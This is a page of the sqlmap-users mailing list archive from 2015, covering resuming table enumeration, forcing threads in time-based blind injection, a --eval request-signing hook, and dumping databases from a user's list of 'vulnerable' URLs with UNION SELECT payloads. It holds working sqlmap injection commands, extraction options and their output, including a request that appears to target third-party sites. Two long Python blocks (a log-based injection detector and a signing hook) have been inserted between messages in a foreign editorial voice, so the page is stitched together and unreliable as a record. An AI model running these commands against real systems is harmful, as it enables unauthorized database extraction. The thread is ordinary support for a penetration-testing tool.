sqlmap-users Mailing List for sqlmap (Page 7)
Brought to you by:
inquisb
From: Miroslav S. <mir...@gm...> - 2015-10-07 09:06:02

sqlmap has to find a SQLi. It can't just dump data without knowing anything about the SQLi. Every SQLi technique has different rules for data dumping. I would suggest that you run (if you want to be stricter with your given cases):

python sqlmap.py -u "http://hello.com/index.php?id=1" --technique=BU --prefix="" --suffix="-- -" --union-cols=5
python sqlmap.py -u "http://world.com/index.php?page=3" --technique=BU --prefix="" --suffix="-- -" --union-cols=5

Bye

On Wed, Oct 7, 2015 at 11:47 AM, bogdan <bog...@ou...> wrote:
> Hello!
>
> I have a list of vulnerable UnionBased urls (example):
>
> http://hello.com/index.php?id=-1+and+union+all+select+1,2,3,[point],4,5--
> http://world.com/index.php?page=3+and+union+all+select+1,2,3,4,[point]--
>
> How can I load one url from this list into sqlmap and dump the structure
> of the database, without finding the injection point?
>
> Sorry for my bad English, and thanks!
>
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users

--
Miroslav Stampar
http://about.me/stamparm
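The defender's view of the UNION-based URLs above: an added example (not sqlmap code, and not written by anyone in this thread) that scans access-log lines for "union ... select <column list>" payloads and flags a client that walks through several column counts on one parameter, which is what a --union-cols run looks like from the server side. It also handles percent-encoded payloads, which the thread's URLs do not show; the log lines, client addresses and the enumeration threshold are constructed.

```python
"""Spot UNION-based SQL injection probing in web-server access logs.

Added example for this thread; it is not sqlmap code and not written by any
of the posters. The log lines, client addresses and threshold below are
constructed for the demonstration.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Common/combined log format: client, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# "union [all|distinct] select <col>, <col>, ..." as in the thread's URLs
# (e.g. "union all select 1,2,3,4,5"); the named group holds the column list.
UNION_RE = re.compile(
    r"union\s+(?:all\s+|distinct\s+)?select\s+(?P<cols>\w+(?:\s*,\s*\w+)*)",
    re.IGNORECASE,
)

# Trailing SQL comment that discards the rest of the original query
# ("--", "-- -" as in the --suffix above, "#", or an opened "/*").
TAIL_COMMENT_RE = re.compile(r"(--\s*-?\s*$|#\s*$|/\*)")

# A client that tries this many different column counts on one parameter
# is enumerating the UNION column count. Constructed threshold.
ENUM_THRESHOLD = 3


def union_column_count(value):
    """Return the number of columns in a UNION SELECT payload, or None."""
    m = UNION_RE.search(value)
    if m is None:
        return None
    return len(m.group("cols").split(","))


def parse_request(line):
    """Split one log line into (ip, ts, path, [(param, decoded value), ...])."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qsl undoes both '+' (space) and %XX encoding, so the regexes
    # see the payload the way the database server would.
    params = parse_qsl(parts.query, keep_blank_values=True)
    return m.group("ip"), m.group("ts"), parts.path, params


def analyze_log(log_text):
    """Return per-request hits and per-(client, path, param) enumeration."""
    hits = []
    tried = defaultdict(set)  # (ip, path, param) -> column counts seen
    for line in log_text.splitlines():
        req = parse_request(line)
        if req is None:
            continue
        ip, ts, path, params = req
        for name, value in params:
            ncols = union_column_count(value)
            if ncols is None:
                continue
            hits.append({
                "ip": ip, "ts": ts, "path": path, "param": name,
                "columns": ncols,
                "comment_suffix": TAIL_COMMENT_RE.search(value) is not None,
            })
            tried[(ip, path, name)].add(ncols)
    enumeration = [
        {"ip": ip, "path": path, "param": name, "column_counts": sorted(counts)}
        for (ip, path, name), counts in tried.items()
        if len(counts) >= ENUM_THRESHOLD
    ]
    return {"hits": hits, "column_enumeration": enumeration}


# Constructed sample log: one client walks the column count 3, 4, 5 on
# index.php?id (plain and percent-encoded); another sends harmless traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [07/Oct/2015:11:47:01 +0200] "GET /index.php?id=1 HTTP/1.1" 200 5120
198.51.100.7 - - [07/Oct/2015:11:47:02 +0200] "GET /index.php?id=-1+and+union+all+select+1,2,3-- HTTP/1.1" 200 4980
198.51.100.7 - - [07/Oct/2015:11:47:03 +0200] "GET /index.php?id=-1+and+union+all+select+1,2,3,4-- HTTP/1.1" 200 4980
198.51.100.7 - - [07/Oct/2015:11:47:04 +0200] "GET /index.php?id=-1%20AND%20UNION%20ALL%20SELECT%201,2,3,4,5--%20- HTTP/1.1" 200 6011
192.0.2.20 - - [07/Oct/2015:11:48:10 +0200] "GET /search.php?q=credit+union+branches HTTP/1.1" 200 2210
192.0.2.20 - - [07/Oct/2015:11:48:11 +0200] "POST /login.php HTTP/1.1" 302 0
"""

if __name__ == "__main__":
    report = analyze_log(SAMPLE_LOG)
    for h in report["hits"]:
        print(f'{h["ts"]} {h["ip"]} {h["path"]}?{h["param"]}: '
              f'{h["columns"]} columns, comment suffix={h["comment_suffix"]}')
    for e in report["column_enumeration"]:
        print(f'column enumeration from {e["ip"]} on {e["path"]}?{e["param"]}: '
              f'{e["column_counts"]}')
```

The single-request hits are useful on their own, but the enumeration entry (one client, one parameter, several column counts in a row) is the stronger signal of an automated tool rather than a stray test string.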
From: bogdan <bog...@ou...> - 2015-10-07 08:49:30

Hello!

I have a list of vulnerable UnionBased urls (example):

http://hello.com/index.php?id=-1+and+union+all+select+1,2,3,[point],4,5--
http://world.com/index.php?page=3+and+union+all+select+1,2,3,4,[point]--

How can I load one url from this list into sqlmap and dump the structure of the database, without finding the injection point?

Sorry for my bad English, and thanks!
From: Indra Z. <net...@gm...> - 2015-09-28 09:18:31

Hohoooo Cool thanks

On Sep 28, 2015 4:15 PM, "Miroslav Stampar" <mir...@gm...> wrote:
> Hi.
>
> Update to the latest revision and do the following:
>
> .. --tables --limit=105
>
> Bye
>
> p.s. you are lucky that you are using MySQL as this patch is "doable" (as MySQL uses the LIMIT m,n mechanism)
> p.p.s. for example:
>
> A) python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --technique=B --tables -D acuart
>
> returns
>
> Database: acuart
> [8 tables]
> +-----------+
> | artists   |
> | carts     |
> | categ     |
> | featured  |
> | guestbook |
> | pictures  |
> | products  |
> | users     |
> +-----------+
>
> while
>
> B) python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --technique=B --tables -D acuart --start 5
>
> returns
>
> Database: acuart
> [4 tables]
> +-----------+
> | guestbook |
> | pictures  |
> | products  |
> | users     |
> +-----------+
From: Miroslav S. <mir...@gm...> - 2015-09-28 09:15:33

Hi.

Update to the latest revision and do the following:

.. --tables --limit=105

Bye

p.s. you are lucky that you are using MySQL as this patch is "doable" (as MySQL uses the LIMIT m,n mechanism)
p.p.s. for example:

A) python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --technique=B --tables -D acuart

returns

Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+

while

B) python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --technique=B --tables -D acuart --start 5

returns

Database: acuart
[4 tables]
+-----------+
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+

On Mon, Sep 28, 2015 at 11:04 AM, Miroslav Stampar <mir...@gm...> wrote:
> Just a sec. Will do some "adjustments" :)
>
> Bye

--
Miroslav Stampar
http://about.me/stamparm
From: Miroslav S. <mir...@gm...> - 2015-09-28 09:04:08

Just a sec. Will do some "adjustments" :)

Bye

On Mon, Sep 28, 2015 at 10:25 AM, Indra Zulkarnain <net...@gm...> wrote:
> Mysql

--
Miroslav Stampar
http://about.me/stamparm
From: Indra Z. <net...@gm...> - 2015-09-28 08:25:48

Mysql

On Sep 28, 2015 3:18 PM, "Miroslav Stampar" <mir...@gm...> wrote:
> Which DBMS?
>
> Bye
From: Miroslav S. <mir...@gm...> - 2015-09-28 08:18:47

Which DBMS?

Bye

On Mon, Sep 28, 2015 at 10:07 AM, Indra Zulkarnain <net...@gm...> wrote:
> Hi miro
>
> Oh, I see..
> Ok, thanks for the reply
>
> I'm using time based injection so you can imagine how long it takes for me
> to do 113 tables from the start instead of resuming from 105
>
> Thanks again

--
Miroslav Stampar
http://about.me/stamparm
From: Indra Z. <net...@gm...> - 2015-09-28 08:07:35

Hi miro

Oh, I see..
Ok, thanks for the reply

I'm using time based injection so you can imagine how long it takes for me to do 113 tables from the start instead of resuming from 105

Thanks again

On Sep 28, 2015 2:45 PM, "Miroslav Stampar" <mir...@gm...> wrote:
> Hi.
>
> You haven't told which SQLi technique has been identified by sqlmap (e.g.
> boolean-based blind). Also, has sqlmap extracted those table names by
> common table name search or by regular querying of the system tables (you
> could remember this from the first sqlmap run)?
>
> If you are combining --common-tables with regular --tables, especially if
> sqlmap uses regular querying of system tables, this won't work. The thing
> is that sqlmap doesn't know what is the "first table in database", nor
> "second table in database", nor... All those tables are the same when
> querying from system tables. Also, there can't be one huge "...WHERE
> table_name NOT IN ('...','...'...)" as your request would most probably be
> dropped by the web server (due to its HUGE length).
>
> Bye
From: Miroslav S. <mir...@gm...> - 2015-09-28 07:45:10

Hi.

You haven't told which SQLi technique has been identified by sqlmap (e.g. boolean-based blind). Also, has sqlmap extracted those table names by common table name search or by regular querying of the system tables (you could remember this from the first sqlmap run)?

If you are combining --common-tables with regular --tables, especially if sqlmap uses regular querying of system tables, this won't work. The thing is that sqlmap doesn't know what is the "first table in database", nor "second table in database", nor... All those tables are the same when querying from system tables. Also, there can't be one huge "...WHERE table_name NOT IN ('...','...'...)" as your request would most probably be dropped by the web server (due to its HUGE length).

Bye

On Mon, Sep 28, 2015 at 3:40 AM, Indra Zulkarnain <net...@gm...> wrote:
> Hi, miro thanks for the reply
>
> Actually I already have 105 table names cracked, so I use them in common tables.
> I'm trying to run sqlmap with --common-tables
>
> So far it works: sqlmap successfully brute forces all the 105 table names
> But when I try to resume it with --tables it starts from 1 again
>
> I just thought that if sqlmap can do start and stop for data extraction,
> why not table names

--
Miroslav Stampar
http://about.me/stamparm
From: Indra Z. <net...@gm...> - 2015-09-28 01:40:18

Hi, miro thanks for the reply

Actually I already have 105 table names cracked, so I use them in common tables.
I'm trying to run sqlmap with --common-tables

So far it works: sqlmap successfully brute forces all the 105 table names
But when I try to resume it with --tables it starts from 1 again

I just thought that if sqlmap can do start and stop for data extraction, why not table names

On Sep 27, 2015 9:01 PM, "Miroslav Stampar" <mir...@gm...> wrote:
> In case of flushing the session, nothing is being left (session is erased
> and overwritten).
>
> Bye
From: Miroslav S. <mir...@gm...> - 2015-09-27 14:01:44

In case of flushing the session, nothing is being left (session is erased and overwritten).

Bye

On Sun, Sep 27, 2015 at 5:45 AM, Indra Zulkarnain <net...@gm...> wrote:
> hi guys
>
> is there a way to resume tables injection
>
> i already have 105 tables but then i flush the session
> how do i start from 105 to 113 tables
>
> thanks

--
Miroslav Stampar
http://about.me/stamparm
From: Indra Z. <net...@gm...> - 2015-09-27 03:45:33

hi guys

is there a way to resume tables injection

i already have 105 tables but then i flush the session
how do i start from 105 to 113 tables

thanks
From: Tobias G. <tgl...@se...> - 2015-09-26 09:00:39

Hi Miroslav,

awesome, thanks so much!

Best Regards
Tobias

> -----Original Message-----
> From: Miroslav Stampar [mailto:mir...@gm...]
> Sent: Saturday, 26 September 2015 00:11
> To: Tobias Glemser
> Cc: SqlMap List
> Subject: Re: AW: [sqlmap-users] Force thread even if time based blind? [ Z1 UNGESICHERT ]
>
> Implemented (hidden) switch --force-threads with the latest commit.
>
> Example sqlmap call:
>
> python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --technique=T --threads=4 --batch --banner --force-threads
>
> Bye
From: Miroslav S. <mir...@gm...> - 2015-09-25 22:10:51

Implemented (hidden) switch --force-threads with the latest commit.

Example sqlmap call:

python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --technique=T --threads=4 --batch --banner --force-threads

Bye

On Fri, Sep 25, 2015 at 10:09 PM, Miroslav Stampar <mir...@gm...> wrote:
> I'll make hidden switch and let you know.
>
> Bye

--
Miroslav Stampar
http://about.me/stamparm
From: Miroslav S. <mir...@gm...> - 2015-09-25 20:10:02
|
I'll make hidden switch and let you know.

Bye

On Sep 25, 2015 9:07 PM, "Tobias Glemser" <tgl...@se...> wrote:
> Hi Miroslav,
>
> thanks for your fast reply (as always).
>
> > In majority of cases you'll get totally wrong results.
> In the past it worked quite nice with lots of targets.
>
> > Also, you risk DoSing
> > the server (especially in case of OR time-based and heavy queries).
> Right.
>
> > There is no force option nor will there be.
> Alright, I'll move to my /lib/techniques/blind/inference.py :)
>
> Cheers
>
> Tobias
>
> > -----Original Message-----
> > From: Miroslav Stampar [mailto:mir...@gm...]
> > Sent: Friday, 25 September 2015 19:17
> > To: Tobias Glemser
> > Cc: SqlMap List
> > Subject: Re: [sqlmap-users] Force thread even if time based blind? [ Z1
> > UNGESICHERT ]
> >
> > In majority of cases you'll get totally wrong results. Also, you risk
> > DoSing the server (especially in case of OR time-based and heavy
> > queries). There is no force option nor will there be.
> >
> > Bye
> >
> > On Sep 25, 2015 7:14 PM, "Tobias Glemser" <tgl...@se...> wrote:
> >
> > Hi List,
> >
> > does anybody know a way to disable the "multi-threading is considered
> > unsafe in time-based data retrieval. Going to switch it off
> > automatically" thing? I don't care about some wrong characters, I need
> > speed :) So maybe there is a "force" option I missed. Thanks in advance.
> >
> > Tobias
> >
> > ------------------------------------------------------------------------------
> > _______________________________________________
> > sqlmap-users mailing list
> > sql...@li...
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> > |
From: Tobias G. <tgl...@se...> - 2015-09-25 19:07:42
|
Hi Miroslav,

thanks for your fast reply (as always).

> In majority of cases you'll get totally wrong results.
In the past it worked quite nice with lots of targets.

> Also, you risk DoSing
> the server (especially in case of OR time-based and heavy queries).
Right.

> There is no force option nor will there be.
Alright, I'll move to my /lib/techniques/blind/inference.py :)

Cheers

Tobias

> -----Original Message-----
> From: Miroslav Stampar [mailto:mir...@gm...]
> Sent: Friday, 25 September 2015 19:17
> To: Tobias Glemser
> Cc: SqlMap List
> Subject: Re: [sqlmap-users] Force thread even if time based blind? [ Z1
> UNGESICHERT ]
>
> In majority of cases you'll get totally wrong results. Also, you risk
> DoSing the server (especially in case of OR time-based and heavy
> queries). There is no force option nor will there be.
>
> Bye
>
> On Sep 25, 2015 7:14 PM, "Tobias Glemser" <tgl...@se...> wrote:
>
> Hi List,
>
> does anybody know a way to disable the "multi-threading is considered
> unsafe in time-based data retrieval. Going to switch it off
> automatically" thing? I don't care about some wrong characters, I need
> speed :) So maybe there is a "force" option I missed. Thanks in advance.
>
> Tobias
>
> ------------------------------------------------------------------------------
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> |
From: Miroslav S. <mir...@gm...> - 2015-09-25 17:17:00
|
In majority of cases you'll get totally wrong results. Also, you risk DoSing the server (especially in case of OR time-based and heavy queries). There is no force option nor will there be.

Bye

On Sep 25, 2015 7:14 PM, "Tobias Glemser" <tgl...@se...> wrote:
> Hi List,
>
> does anybody know a way to disable the "multi-threading is considered
> unsafe in time-based data retrieval. Going to switch it off automatically"
> thing? I don't care about some wrong characters, I need speed :) So maybe
> there is a "force" option I missed. Thanks in advance.
>
> Tobias
>
> ------------------------------------------------------------------------------
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> |
From: Brandon P. <bpe...@gm...> - 2015-09-25 17:16:19
|
There is not as far as I know, but there is no reason why you can't open up multiple instances of sqlmap dumping the specific parts of the database you want.

On Fri, Sep 25, 2015 at 12:01 PM, Tobias Glemser <tgl...@se...> wrote:
> Hi List,
>
> does anybody know a way to disable the "multi-threading is considered
> unsafe in time-based data retrieval. Going to switch it off automatically"
> thing? I don't care about some wrong characters, I need speed :) So maybe
> there is a "force" option I missed. Thanks in advance.
>
> Tobias
>
> ------------------------------------------------------------------------------
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website |
From: Tobias G. <tgl...@se...> - 2015-09-25 17:14:03
|
Hi List,

does anybody know a way to disable the "multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically" thing? I don't care about some wrong characters, I need speed :) So maybe there is a "force" option I missed. Thanks in advance.

Tobias |
From: Vincent M. <vi...@ma...> - 2015-09-18 10:59:02
|
Thanks! This is working. I am able to insert a hash value computed from different elements in each request.

For the record, if you want to compute a hash from a URL and the content of your post:

import hashlib
s1 = hashlib.sha1()
s1.update("".join([_locals['uri'], _locals['post']]).encode())
signature = "$1$" + s1.hexdigest()

And then insert this signature in the request:

_locals['auxHeaders']["X-Custom-Signature"] = signature

Pro tip: if for some reason the ":443" added at the end of the FQDN bothers you, you can delete it:

_locals['uri'] = _locals['uri'].replace(":443", "")

Regards, Vincent.

> On 17 Sept 2015 at 15:36, Miroslav Stampar <mir...@gm...> wrote:
>
> First, please update to the latest revision.
>
> - now you have a variable "_locals" as a copy of query locals() inside the --eval. In most cases you'll be able to just read it (e.g. changes to string objects won't be reflected)
> - inside of it there is an entry "method" which, if it is set to None or "GET", means you are dealing with a GET request; otherwise the method will be set to something concrete. Take a look at: http://pastebin.com/Vbit2RDt
> - also, there is an entry "auxHeaders" where you can put a custom header value inside of --eval. Take a look at: http://pastebin.com/8qd9gG0J
>
> Bye
>
> p.s. this is a "hack", just to help users in this kind of cases. Please don't expect anything more to be implemented as I am pretty sure that this is currently more than enough for your case
>
> On Thu, Sep 17, 2015 at 11:29 AM, Vincent Malguy <vi...@ma...> wrote:
> I think so, but how can I access and modify headers in an --eval?
>
> ./sqlmap.py -u "http://www.google.com/?id=1" --eval="print(uri) ; print(method); print(headers); print(body);"
> [11:24:12] [INFO] testing connection to the target URL
> http://www.google.com:80/ <- uri is good !
> [11:24:12] [CRITICAL] an error occurred while evaluating provided code ('name 'method' is not defined')
>
> Can headers and body not be accessed either?
>
> Regards, Vincent
>
> > On 16 Sept 2015 at 20:43, Brandon Perry <bpe...@gm...> wrote:
> >
> > Could you use --eval for this instead?
> >
> > On Wed, Sep 16, 2015 at 10:17 AM, Vincent Malguy <vi...@ma...> wrote:
> > Hi,
> >
> > I am new to tamper scripts and I have to forge some custom headers to pass an API authentication.
> > I need to get the HTTP method (GET, POST, ...) used by the next sqlmap request and the exact URL that will be used.
> >
> > For example, in this header:
> > [17:06:22] [TRAFFIC OUT] HTTP request [#35]:
> > GET /1.0/iot/app/SQLIHERE HTTP/1.1
> > Accept-language: en-us,en;q=0.5
> > Accept-encoding: identity
> > Pragma: no-cache
> > Cache-control: no-cache,no-store
> > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> > User-agent: sqlmap/1.0-dev-c59ead3 (http://sqlmap.org)
> > Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
> >
> > I want to be able to get the first line: GET /1.0/iot/app/SQLIHERE
> > From this line, I would be able to parse for the method and get the URI that I will *statically* concat with the base URL of the API.
> >
> > So far I have managed to compute the auth header and use sqlmap to test the API but I have to update my tamper script for each different endpoint (URI).
> >
> > Thanks for your help.
> >
> > ------------------------------------------------------------------------------
> > Monitor Your Dynamic Infrastructure at Any Scale With Datadog!
> > Get real-time metrics from all of your servers, apps and tools
> > in one place.
> > SourceForge users - Click here to start your Free Trial of Datadog now!
> > http://pubads.g.doubleclick.net/gampad/clk?id=241902991&iu=/4140
> > _______________________________________________
> > sqlmap-users mailing list
> > sql...@li...
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >
> > --
> > http://volatile-minds.blogspot.com -- blog
> > http://www.volatileminds.net -- website
>
> ------------------------------------------------------------------------------
> Monitor Your Dynamic Infrastructure at Any Scale With Datadog!
> Get real-time metrics from all of your servers, apps and tools
> in one place.
> SourceForge users - Click here to start your Free Trial of Datadog now!
> http://pubads.g.doubleclick.net/gampad/clk?id=241902991&iu=/4140
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
> --
> Miroslav Stampar
> http://about.me/stamparm |
From: Miroslav S. <mir...@gm...> - 2015-09-17 13:37:02
|
First, please update to the latest revision.

- now you have a variable "_locals" as a copy of query locals() inside the --eval. In most cases you'll be able to just read it (e.g. changes to string objects won't be reflected)
- inside of it there is an entry "method" which, if it is set to None or "GET", means you are dealing with a GET request; otherwise the method will be set to something concrete. Take a look at: http://pastebin.com/Vbit2RDt
- also, there is an entry "auxHeaders" where you can put a custom header value inside of --eval. Take a look at: http://pastebin.com/8qd9gG0J

Bye

p.s. this is a "hack", just to help users in this kind of cases. Please don't expect anything more to be implemented as I am pretty sure that this is currently more than enough for your case

On Thu, Sep 17, 2015 at 11:29 AM, Vincent Malguy <vi...@ma...> wrote:
> I think so, but how can I access and modify headers in an --eval?
>
> ./sqlmap.py -u "http://www.google.com/?id=1" --eval="print(uri) ;
> print(method); print(headers); print(body);"
> [11:24:12] [INFO] testing connection to the target URL
> http://www.google.com:80/ <- uri is good !
> [11:24:12] [CRITICAL] an error occurred while evaluating provided code
> ('name 'method' is not defined')
>
> Can headers and body not be accessed either?
>
> Regards, Vincent
>
> > On 16 Sept 2015 at 20:43, Brandon Perry <bpe...@gm...> wrote:
> >
> > Could you use --eval for this instead?
> >
> > On Wed, Sep 16, 2015 at 10:17 AM, Vincent Malguy <vi...@ma...> wrote:
> > Hi,
> >
> > I am new to tamper scripts and I have to forge some custom headers to
> > pass an API authentication.
> > I need to get the HTTP method (GET, POST, ...) used by the next sqlmap
> > request and the exact URL that will be used.
> >
> > For example, in this header:
> > [17:06:22] [TRAFFIC OUT] HTTP request [#35]:
> > GET /1.0/iot/app/SQLIHERE HTTP/1.1
> > Accept-language: en-us,en;q=0.5
> > Accept-encoding: identity
> > Pragma: no-cache
> > Cache-control: no-cache,no-store
> > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> > User-agent: sqlmap/1.0-dev-c59ead3 (http://sqlmap.org)
> > Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
> >
> > I want to be able to get the first line: GET /1.0/iot/app/SQLIHERE
> > From this line, I would be able to parse for the method and get the URI
> > that I will *statically* concat with the base URL of the API.
> >
> > So far I have managed to compute the auth header and use sqlmap to test
> > the API but I have to update my tamper script for each different endpoint
> > (URI).
> >
> > Thanks for your help.
> >
> > ------------------------------------------------------------------------------
> > Monitor Your Dynamic Infrastructure at Any Scale With Datadog!
> > Get real-time metrics from all of your servers, apps and tools
> > in one place.
> > SourceForge users - Click here to start your Free Trial of Datadog now!
> > http://pubads.g.doubleclick.net/gampad/clk?id=241902991&iu=/4140
> > _______________________________________________
> > sqlmap-users mailing list
> > sql...@li...
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >
> > --
> > http://volatile-minds.blogspot.com -- blog
> > http://www.volatileminds.net -- website
>
> ------------------------------------------------------------------------------
> Monitor Your Dynamic Infrastructure at Any Scale With Datadog!
> Get real-time metrics from all of your servers, apps and tools
> in one place.
> SourceForge users - Click here to start your Free Trial of Datadog now!
> http://pubads.g.doubleclick.net/gampad/clk?id=241902991&iu=/4140
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users

--
Miroslav Stampar
http://about.me/stamparm |
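The --eval hook discussed in the two messages above (Miroslav's `_locals` / `auxHeaders` entries, and Vincent's SHA-1 signature from the message before that) written out as a stand-alone Python script so it can be exercised without sqlmap. This is an added example, not sqlmap's code and not Vincent's --eval line: the `_locals` dictionary is a constructed stand-in shaped the way the thread describes it (`uri`, `method`, `post`, `auxHeaders`); the header name `X-Custom-Signature` and the `$1$` + SHA-1(uri || post) scheme are taken from Vincent's mail; the API host and path are hypothetical; and it is an assumption that `post` may be `None` for a GET request. The port stripping uses the URL parser rather than a blind `replace(":443", "")`, so a `443` that happens to appear in the query string is left alone.

```python
import hashlib
import hmac
from urllib.parse import urlsplit, urlunsplit

SIGNATURE_HEADER = "X-Custom-Signature"      # header name from Vincent's mail
DEFAULT_PORTS = {"http": 80, "https": 443}


def canonical_uri(uri):
    """Drop an explicit default port (":443" on https, ":80" on http) from the
    URL sqlmap reports, so the hash matches what the API computes from its own
    view of the request. Unlike uri.replace(":443", "") this only touches the
    authority part, never a ":443" that sits in the path or query string."""
    parts = urlsplit(uri)
    if parts.port is not None and DEFAULT_PORTS.get(parts.scheme) == parts.port:
        parts = parts._replace(netloc=parts.netloc.rsplit(":", 1)[0])
    return urlunsplit(parts)


def compute_signature(uri, post):
    """Vincent's scheme: "$1$" followed by hex(SHA-1(uri || post)).
    `post` may be None for a GET (assumption); it is treated as empty."""
    digest = hashlib.sha1((canonical_uri(uri) + (post or "")).encode()).hexdigest()
    return "$1$" + digest


def eval_hook(_locals):
    """The --eval snippet as a function. `_locals` is the dictionary sqlmap
    exposes (per the thread: "uri", "method", "post", "auxHeaders"); None or
    "GET" in "method" means a GET request, whose body is not signed.
    Mutates _locals["auxHeaders"] in place and returns the header value."""
    method = _locals.get("method") or "GET"
    post = _locals.get("post") if method.upper() != "GET" else ""
    signature = compute_signature(_locals["uri"], post)
    _locals.setdefault("auxHeaders", {})[SIGNATURE_HEADER] = signature
    return signature


def verify_signature(uri, post, header_value):
    """What the API side of the same scheme would do; constant-time comparison
    so the check itself does not leak how many leading bytes matched."""
    return hmac.compare_digest(compute_signature(uri, post), header_value)


if __name__ == "__main__":
    # Constructed sample of what sqlmap would hand to --eval for one POST
    # probe; the host and path are hypothetical.
    sample = {
        "uri": "https://api.example.com:443/1.0/iot/app",
        "method": "POST",
        "post": "id=1' AND SLEEP(5)-- -",
        "auxHeaders": {},
    }
    sig = eval_hook(sample)
    print("%s: %s" % (SIGNATURE_HEADER, sig))
    print("API accepts:", verify_signature("https://api.example.com/1.0/iot/app",
                                           sample["post"], sig))
```

To use it in sqlmap, the body of `eval_hook` is what goes into `--eval` (statements separated by `;`). Note that the scheme carries no secret: anyone who knows the recipe can produce a valid header, so it proves nothing beyond "the client knows the recipe", and concatenating `uri` and `post` with no separator means two different (uri, post) pairs can hash identically. Both are properties of the API the hook has to satisfy, not something the hook can fix.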
From: Vincent M. <vi...@ma...> - 2015-09-17 09:29:24
|
I think so, but how can I access and modify headers in an --eval?

./sqlmap.py -u "http://www.google.com/?id=1" --eval="print(uri) ; print(method); print(headers); print(body);"
[11:24:12] [INFO] testing connection to the target URL
http://www.google.com:80/ <- uri is good !
[11:24:12] [CRITICAL] an error occurred while evaluating provided code ('name 'method' is not defined')

Can headers and body not be accessed either?

Regards, Vincent

> On 16 Sept 2015 at 20:43, Brandon Perry <bpe...@gm...> wrote:
>
> Could you use --eval for this instead?
>
> On Wed, Sep 16, 2015 at 10:17 AM, Vincent Malguy <vi...@ma...> wrote:
> Hi,
>
> I am new to tamper scripts and I have to forge some custom headers to pass an API authentication.
> I need to get the HTTP method (GET, POST, ...) used by the next sqlmap request and the exact URL that will be used.
>
> For example, in this header:
> [17:06:22] [TRAFFIC OUT] HTTP request [#35]:
> GET /1.0/iot/app/SQLIHERE HTTP/1.1
> Accept-language: en-us,en;q=0.5
> Accept-encoding: identity
> Pragma: no-cache
> Cache-control: no-cache,no-store
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> User-agent: sqlmap/1.0-dev-c59ead3 (http://sqlmap.org)
> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
>
> I want to be able to get the first line: GET /1.0/iot/app/SQLIHERE
> From this line, I would be able to parse for the method and get the URI that I will *statically* concat with the base URL of the API.
>
> So far I have managed to compute the auth header and use sqlmap to test the API but I have to update my tamper script for each different endpoint (URI).
>
> Thanks for your help.
>
> ------------------------------------------------------------------------------
> Monitor Your Dynamic Infrastructure at Any Scale With Datadog!
> Get real-time metrics from all of your servers, apps and tools
> in one place.
> SourceForge users - Click here to start your Free Trial of Datadog now!
> http://pubads.g.doubleclick.net/gampad/clk?id=241902991&iu=/4140
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website |
From: Brandon P. <bpe...@gm...> - 2015-09-16 18:44:06
|
Could you use --eval for this instead?

On Wed, Sep 16, 2015 at 10:17 AM, Vincent Malguy <vi...@ma...> wrote:
> Hi,
>
> I am new to tamper scripts and I have to forge some custom headers to pass
> an API authentication.
> I need to get the HTTP method (GET, POST, ...) used by the next sqlmap
> request and the exact URL that will be used.
>
> For example, in this header:
> [17:06:22] [TRAFFIC OUT] HTTP request [#35]:
> GET /1.0/iot/app/SQLIHERE HTTP/1.1
> Accept-language: en-us,en;q=0.5
> Accept-encoding: identity
> Pragma: no-cache
> Cache-control: no-cache,no-store
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> User-agent: sqlmap/1.0-dev-c59ead3 (http://sqlmap.org)
> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
>
> I want to be able to get the first line: GET /1.0/iot/app/SQLIHERE
> From this line, I would be able to parse for the method and get the URI
> that I will *statically* concat with the base URL of the API.
>
> So far I have managed to compute the auth header and use sqlmap to test
> the API but I have to update my tamper script for each different endpoint
> (URI).
>
> Thanks for your help.
>
> ------------------------------------------------------------------------------
> Monitor Your Dynamic Infrastructure at Any Scale With Datadog!
> Get real-time metrics from all of your servers, apps and tools
> in one place.
> SourceForge users - Click here to start your Free Trial of Datadog now!
